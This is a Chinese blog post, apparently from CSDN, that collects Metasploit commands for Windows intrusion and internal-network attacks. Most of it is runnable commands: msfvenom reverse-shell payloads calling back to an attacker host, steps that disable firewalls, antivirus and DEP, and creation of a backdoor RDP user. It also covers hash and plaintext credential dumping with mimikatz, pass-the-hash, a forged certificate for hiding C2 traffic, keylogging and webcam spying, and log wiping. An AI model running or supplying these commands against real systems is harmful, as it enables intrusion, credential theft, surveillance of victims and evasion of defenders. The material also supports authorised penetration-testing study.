MSF使用总结

已于 2022-05-29 12:58:56 修改
阅读量4.4k 收藏 28
点赞数 1
分类专栏: # 安全工具使用 # 内网渗透 文章标签: windows 内网安全
于 2020-09-25 23:23:05 首次发布
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/108804127
版权

文章目录

安装

curl https://raw.githubusercontent.com/rapid7/metasploit- omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

获取shell

# 生成
msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe

# kali监听,等待连接
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
run

模块化

  • exploits 漏洞利用模块,这个模块通常是用于对某些有可能存在漏洞的目标进行漏洞利用。
  • payloads 攻击载荷,exploit成功之后就会执行payload,这段payload可以是反弹代码,可以是添加用户的代码。
  • auxiliary 辅助模块,该模块是用于辅助渗透的,比如端口扫描、存活探测、暴力破解。
  • post 后渗透模块,该模块一般用于内网渗透。
  • encoders 编码器模块,对payload进行编码加密,可绕过部分杀软软件。
  • evasion 躲避模块,该模块分类下只有4个,都是为了躲避微软的限制或者是杀软的,免杀效果很一般。
  • nops 空指令模块,为了避免攻击载荷在执行的过程中出现随机地址错误而在执行shellcode之前加入一些空指令,使得在执行shellcode时有一个较大的安全着陆区。

msfconsole使用

在这里插入图片描述

基础命令

加载模块
use name

查看网络配置
ifconfig

获取进程列表
ps

查看所有exploit
show exploits

查看所有payload
show payloads

查看所有auxiliary
show auxiliary

展示模块详细信息
info

查找模块
search name

查看当前运行的模块
jobs

重启目标机器
reboot

关闭目标机器
shutdown

获取交互shell
shell

当前meterpreter到后台
background

离开msf
quit

信息搜集

pwd	# 查看当前目录
getwd
sysinfo	#主机信息
idletime	# 目标机器闲置时间
getproxy	# 代理信息
run checkvm	# 是否为虚拟机
run post/windows/gather/checkvm
run post/windows/gather/enum_applications	# 获取主机安装软件、补丁
run post/multi/gather/env	# 获取目标主机环境变量
run post/windows/gather/enum_ie	# 获取ie缓存
run post/windows/gather/enum_chrome	# 获取Chrome缓存

防火墙、杀软

参考:https://www.cnblogs.com/3ichae1/p/13046760.html

查看防火墙状态
run getcountermeasure

关闭防火墙
run killav
netsh advfirewall set allprofiles state off   ##(管理员以及以上权限)

# 关闭Denfender
net stop windefend
# 关闭DEP,数据执行保护
bcdedit.exe /set {current} nx AlwaysOff
# 关闭杀毒软件
run killav
run post/windows/manage/killava


# 开启远程桌面
run post/windows/manage/enable_rdp
# 关闭远程桌面,上一步会生成一个文件,该文件可用来再关闭远程桌面
run multi_console_command -r 文件地址
# 开启远程桌面并添加一个新用户backdoor
run getgui -u backdoor -p backdoor
run post/windows/manage/enable_rdp username=admin password=123456
# 开启远程桌面并绑定在8888端口
run getgui -e -f 8888
run post/windows/manage/enable_rdp forward=true lport=8888
# 登录远程桌面
rdesktop -u username -p passwd 192.168.1.1


# 桌面截图
screengrab
或者
load espia
screengrab

密码抓取

参考PassingTheHash
在这里插入图片描述

抓取自动登录的密码

run windows/gather/credentials/windows_autologin  // 很多用户习惯将计算机设置自动登录,可以使用

导出密码哈希

hashdump 	//hashdump 模块可以从SAM数据库中导出本地用户账号
run post/windows/gather/hashdump
run post/windows/gather/smart_hashdump

输出格式为: 用户名:SID:LM哈希:NTLM哈希:::

Administrator:500:aad3b435b51404eeaad3b435b51404ee:b3ec3e03e2a202cbd54fd104b8504fef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
qaq:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
admin:1001:aad3b435b51404eeaad3b435b51404ee:90ce5f791d1174470eaf43c7374fb533:::

注:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0为空密码

上传mimikatz程序

execute  -i  -f  mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

加载kiwi模块

load kiwi
help kiwi
creds_all	#该命令可以列举系统中的明文密码
kiwi_cmd	#使用mimikatz的全部功能,该命令后面接 mimikatz.exe 的命令
kiwi_cmd sekurlsa::logonpasswords
kiwi_cmd sekurlsa::searchPasswords

参数解释

creds_all:列举所有凭据
creds_kerberos:列举所有kerberos凭据
creds_msv:列举所有msv凭据
creds_ssp:列举所有ssp凭据
creds_tspkg:列举所有tspkg凭据
creds_wdigest:列举所有wdigest凭据
dcsync:通过DCSync检索用户帐户信息
dcsync_ntlm:通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create:创建黄金票据
kerberos_ticket_list:列举kerberos票据
kerberos_ticket_purge:清除kerberos票据
kerberos_ticket_use:使用kerberos票据
kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam:dump出lsa的SAM
lsa_dump_secrets:dump出lsa的密文
password_change:修改密码
wifi_list:列出当前用户的wifi配置文件
wifi_list_shared:列出共享wifi配置文件/编码

使用hash进行登录(好像只能是administrator)

参考msf使用hash登陆windows

use exploit/windows/smb/psexec
set SMBuser administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:b3ec3e03e2a202cbd54fd104b8504fef
set rhost 192.168.170.131
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
run

如果有报错

[-] 192.168.48.144:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)

原因:较新的Windows系统默认情况下是不允许共享服务不允许远程访问

解决:将注册表中LocalAccountTokenFilterPolicy的值更改为1,参考内网横向移动之LocalAccountTokenFilterPolicy,或者关闭uac

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f	#添加
或
reg.exe ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG DWORD /d 0 /f
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

端口扫描、主机发现、版本扫描

ACK             通过ACK扫描的方式对防火墙上未屏蔽的端口进行探测
ftpbounce       通过FTPbounce攻击的原理对TCP服务进行枚举,一些新的FTP服务器软件能够很好的防范FTPbounce攻击,但在一些旧的Solaris及FreeBSD系统的FTP服务中此类工具方法仍能够被利用
syn             使用发送TCP SYN标志的方式探测开放的端口
tcp             通过一次完整的TCP连接来判断端口是否开放,这种扫描方式最准确,但扫描速度较慢
xmas            一种更为隐秘的扫描方式,通过发送FIN,PSH,和URG标志,能够躲避一些高级的TCP标记检测器的过滤

TCP端⼝扫描            auxiliary/scanner/portscan/tcp 
ACK防⽕墙扫描          auxiliary/scanner/portscan/ack
FTP跳端⼝扫描          auxiliary/scanner/portscan/ftpbounce 
SYN端⼝扫描            auxiliary/scanner/portscan/syn
TCP-XMas端⼝扫描       auxiliary/scanner/portscan/xmas

经过测试,Windows防火墙开启,使⽤ACK是扫描不出来的!

使用arp发现主机

run post/windows/gather/arp_scanner rhost=192.168.1.0/24

扫描tcp端口

search portsacn
use 5 	# 选择tcp的
set rhost 192.168.1.1/24
set ports 80,8080,8888,3389,22,23
set threads 10
exploit

探测对方操作系统信息:use auxiliary/scanner/smb/smb_version
在这里插入图片描述

可以看到,操作系统是Windows 7,主机名是:LIUWX-PC,不在域内!

端口转发

portfwd  add -l 4444 -p 3389 -r 192.168.1.102 # 端口转发,本机监听4444,把目标机3389转到本机4444 
rdesktop -u Administrator -p ichunqiu 127.0.0.1:4444 #然后使用rdesktop来连接,-u 用户名 -p 密码

小技巧(多主机扫描)

设置扫描目标为一个文件

set rhosts file:/root/ips.txt

在这里插入图片描述
这样的话就会非常⽅便!

进程迁移

手动迁移migrate

migrate 2228 或 migrate -P 2228 //迁移到指定pid号
migrate -N explorer.exe  // 迁移到指定进程

自动迁移

set autorunscript migrate -N explorer.exe
或
set autorunscript -f

第一个是指定迁移到哪个进程,第二个默认迁移到notepad

流量加密

可以参考:红队 | 流量加密:使用OpenSSL进行远控流量加密

Metasploit 在内网做横行渗透时,这些流量很容易就能被检测出来,所以做好流量加密,就能避免审计工具检测出来。下面开始演示如何对 Metasploit 进行流量加密。

生成证书

# 使用 OpenSSL 创建 SSL/TLS 证书
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt > www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt

# Metasploit框架impersonate_ssl模块,自动从信任源创建一个虚假证书
use auxiliary/gather/impersonate_ssl 
set RHOST www.google.com
run

在这里插入图片描述
msfvenom 生成带证书的马

# windows
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.43.239 LPORT=4444 PayloadUUIDTracking=true HandlerSSLCert=/root/桌面/www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=herbert -f exe -o shell.exe
# linux
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.43.239 LPORT=4444 PayloadUUIDTracking=true HandlerSSLCert=/root/桌面/www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=herbert -f elf -o google.elf
# 参数
    HandlerSSLCert:向处理程序通知所使用的PEM证书。
    StagerVerifySSLCert:当收到一个连接时执行SSL证书验证。
    PayloadUUIDTracking和PayloadUUIDName:可以在监听的时候过滤掉不需要的回连请求。
    
# 也可以生成 shellcode 自行编译:
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.43.239 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=/root/Desktop/www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=google -f c

开启监听

# windows
use exploit/multi/handler 
set payload windows/meterpreter/reverse_winhttps
set lhost 0.0.0.0
set lport 4444
set HandlerSSLCert /root/Desktop/www.google.com.pem
set StagerVerifySSLCert true 
set IgnoreUnknowPayloads true
set exitonsession false
exploit

# linux
use exploit/multi/handler 
set payload linux/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
set HandlerSSLCert www.google.com.pem
set StagerVerifySSLCert true 
set IgnoreUnknowPayloads true
exploit

# 参数
	HANDLERSSLCERT选项中设置PEM格式证书的路径来告知有效负载处理程序将使用的证书,
	stagerverifysslcert设置为true来启用对该证书的检查,
	IgnoreUnknownPayloads接受白名单的payload。

添加路由

网段查询

meterpreter > run get_local_subnets
meterpreter > ipconfig

# 在全局给指定的session增删路由
route add 192.168.11.0  255.255.255.0  1     #在session1中添加到达192.168.11.0网段的路由
route del 192.168.12.0  255.255.255.0  2     #在session2中删除到达192.168.12.0网段的路由
route print    								 #打印路由信息

#也可以在进入session下添加路由
run autoroute -s 192.168.11.0/24             #添加路由
run autoroute -d -s 192.168.11.0/24			 #删除路由
run autoroute -p                             #打印路由信息

注意:在实际的内网渗透中,我们可以直接添加到 0.0.0.0/0 的路由。这样,只要该被控主机可达的地址就都可达!

设置Socks代理

搭建Socks4a代理

use auxiliary/server/socks4a
set SRVHOST  0.0.0.0
set SRVPORT  1080
run

search socks
use auxiliary/server/socks_proxy
set version 4a
exploit

搭建Socks5代理

use auxiliary/server/socks5
set SRVHOST  0.0.0.0
set SRVPORT  1080
set USERNAME root
set PASSWORD password
run

连接代理

首先修改/etc/proxychains.conf文件

# 修改配置文件
vim /etc/proxychains4.conf
#在最后修改
socks4 0.0.0.0 1080
socks5 0.0.0.0 1080 root password

然后执行命令前加上 proxychains命令

# 使用代理启动火狐
proxychains firefox

擦屁股、清痕迹

删除添加的账号
net user 用户名 /del

删除日志
clearev

关闭所有session连接
session -K

事件日志

其他

cmdshell 升级
sessions -u 会话id

linux保存的ssh身份验证信息
run post/multi/gather/ssh_creds

# 用户操作:Stdapi: User interface Commands(用户接口命令)
enumdesktops    -->列出所有可访问的桌面和窗口站(窗体列表)
getdesktop      -->得到当前的Meterpreter桌面
idletime        -->返回秒远程用户已经闲置数量
keyscan_start   -->开始捕获击键(开始键盘记录)
keyscan_dump    -->转储按键缓冲(下载键盘记录)
keyscan_stop    -->停止捕获击键(停止键盘记录)

# PS:键盘记录注意点,先开始,后下载,再结束,否则会出错
screenshot      -->抓取交互式桌面截图(当前操作界面截图一张)
setdesktop      -->改变meterpreters当前桌面
uictl           -->控制一些用户界面组件(获取键盘、鼠标控制权)
使用uictl -h 查看帮助(打开/关闭,键盘/鼠标)

# 摄像头:Stdapi: Webcam Commands(摄像头命令)
record_mic       -->X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat      -->开始视频聊天(视频,对方会有弹窗)
webcam_list      -->单摄像头(查看摄像头列表)
webcam_snap      -->采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream    -->播放视频流从指定的摄像头(开启摄像头监控)

# 其他命令操作
getsystem        -->获取高权限
hashdump         -->获取当前用户hash
天问_Herbert555
关注
  • 1
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSF基本使用(基本结构与payload演示)
`or 1 or 不正经の泡泡
03-19 5861
文章目录前言环境基本结构基本专业术语物理结构逻辑结构使用流程渗透基本流程 前言 试个水(Let’s see if we can pass it)最近做一个爬虫项目,手又痒了。 MSF 是一个非常主流的渗透框架,里面包含了相当多的渗透探测模块 环境 Kail 2020 VM 16 主机:Windows 10 基本要求: 严格遵守国家安全法律法规,会使用Linux。 基本结构 基本专业术语 在玩这个之前呢,我们还是需要去先了解一下一些基本的专业术语的 渗透攻击(Exploit) 渗透攻击是指由攻击者或者渗透测试
记录一次体验kali渗透工具MSF以及msfconsole命令详解
ch_ycc的博客
04-22 3452
msfconsole简称msf是一款常见的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全人员的使用
【红队APT】反朔源&流量加密&CS&MSF&证书指纹&C2项目&CDN域前置
今天是几号的博客
04-18 2179
生成后在虚拟机中上线,不过遇到了奇怪的事情就是,我在上线的虚拟机中抓不到http流量的数据包,而在物理机中抓到了(emmm我也不太懂为什么会这样)红队进行权限控制,主机开始限制出网,尝试走常见出网协议http/https,结果流量设备入侵检测检测系统发现异常,尝试修改工具指纹特征加密流量防止检测,结果被定位到控制服务器,这里可以看到msf自带的证书,这里我们对该证书进行伪装(这里其实流量上没做什么改变,知识对默认证书指纹做了修改)这里可以看到,流量进行了加密,只能隐约的看到一些ssl证书信息。
黑客常用的工具之---MSF使用(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
07-15 1152
MSF默认存放模块的目录如下。
组策略错误没有权限执行此操作_Metasploit PSExec执行报错大全
weixin_39915815的博客
11-22 4399
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。所有话题标签:#Web安全 #漏洞复现 #工具使用 #权限提升#权限维持#防护绕过#内网安全 #实战案例#其他笔记 #资源分享 ...
Windows远程桌面服务漏洞(CVE-2019-0708)复现测试
四维创智
09-19 6557
1、漏洞概述 2019年5月14日,微软发布了针对远程桌面服务的关键远程执行代码漏洞CVE-2019-0708的补丁,该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞,便可以在目标系统上执行任意代码,该漏洞的触发无需任何用户交互操作。这就意味着,存在漏洞的计算机只要联网,无需任何操作,就可能遭遇黑客远程攻击,运行恶意代码。其方式与2017年WannaCry恶意软件的传播方式类似。成...
msf反弹shell成功,却无法建立会话处理办法
yang1234567898的博客
01-07 5045
报错:Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444). 如果run的时候出现以下问题导致建立会话失败,可能是端口4444被占用了, 在终端输入 “netstat -tulpen”,查看进程端口信息 通过命令”fuser -k 端口号/tcp“,删除4444端口进程 ...
MSF技术总结
05-07
本文将对 MSF使用和高级用法进行总结。 一、MSF 架构 MSF 由三个主要组件构成:MSF Console、MSF Framework 和 MSF Database。MSF Console 是用户交互的界面,提供了命令行和图形化界面;MSF Framework 是 MSF ...
MSF使用教程
热门推荐
hackzkaq的博客
10-18 3万+
公众号:白帽子左一 MSF简介 Metasploit(MSF)是一个免费的、可下载的框架 它本身附带数百个已知软件漏洞,是一款专业级漏洞攻击工具。 当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了,仿佛一夜之间,任何人都可以成为黑客。 因为只要掌握MSF使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。 也因此软件厂商再也不能推迟发布针对已公布漏洞的补丁了,因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所.
msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419的博客
05-13 945
生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...
linux系统安装msf的过程详解
09-14
总结,安装Linux上的Metasploit Framework需要下载安装脚本,解决依赖问题,创建用户并设置权限,以及了解如何使用MSF的命令行工具。通过这些步骤,你可以顺利地在Linux环境中搭建起MSF环境,进行安全测试和研究。...
【解决】MSF,exp超时报错的问题
Zeker62的博客
03-27 3087
问题,类似于这样的: [*] 192.168.33.129:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1 [-] 192.168.33.129:445 - Timeout::Error [-] 192.168.33.129:445 - execution expired [-] 192.168.33.129:445 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/
一次真是渗透
weixin_30828379的博客
11-19 399
手工进行漏洞检查的最佳途径之一是在metasploit中使用nmap的扫描脚本 root@bt:/opt/metasploit/msf3# msfconsole msf > nmap -sT -A --script=smb-check-vulns -PO 172.16.21.170 Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2013-...
kali 输入 msfconsole 启动报错:/usr/share/metasploit-framework/lib/msf/core/payload/android.rb:87
烟敛寒林的博客
11-24 7509
kali   启动 msfconsole 时候失败,报错: root@kali:~# msfconsole /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:87:in `not_after=': bignum too big to convert into `long' (RangeError)         fro...
2020kali中msfconsole启动失败
qq_43665434的博客
02-15 2394
2020kali中msfconsole启动失败 apt-get install metasploit-framework----------安装框架 service postgresql start----------------启动数据库 msfdb init---------------------------初始化MSF数据库 msfconsole----------------启动msf 结果出现报错 说是少了包 直接gem install bundler安装 安装成功! 重新启动msf msf
0day 安全msf 初探
qq_41071646的博客
08-14 213
msf 这个工具 在我还没有开始学pwn 就有搞web的人 说过这个框架 只是没有怎么了解 没有想到这个工具 竟然使用Ruby 写的,, 社会 社会,。 然后这里 关于在 windows下的安装 我就不说了 反正 都一样(直接用kail的就行) 不过 有一点 感觉很坑 就是 版本不一样 然后 导致我们写的 exploit 可能会加载失败,,(可能是) 这里我也不太确定,因为我也不太...
配置错误的smb共享
山兔的博客
11-18 1488
Windows 是当今最流行的操作系统,不仅由个人用户使用,而且在大公司中也广泛使用。由于其操作简单性以及使用图形界面,如今,大量实体的公司网络充满了运行Windows操作系统的主机和服务器。无论这些机器针对的是最终用户、我们的员工还是现场技术团队,但由于 Windows 操作系统的演示简单性,它们很容易被错误配置,这在现实当中是广泛存在的。Windows 必须提供的机制管理群集中控件定位的差异意味着,在进行安全强化过程时,覆盖操作系统的所有隐藏角落和缝隙并不总是一件容易的事,尤其是对于新手团队。
Metasploit 如何使用Exploits(漏洞)
jklbnm12的博客
02-23 669
在Metasploit中选择一个漏洞利用程序将’exploit’和’check’命令添加到msfconsole。 msf > use  exploit/windows/smb/ms09\_050\_smb2\_negotiate\_func\_indexmsf exploit(ms09\_050\_smb2\_negotiate\_func\_index) > help...略...Exploit 命令=======
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值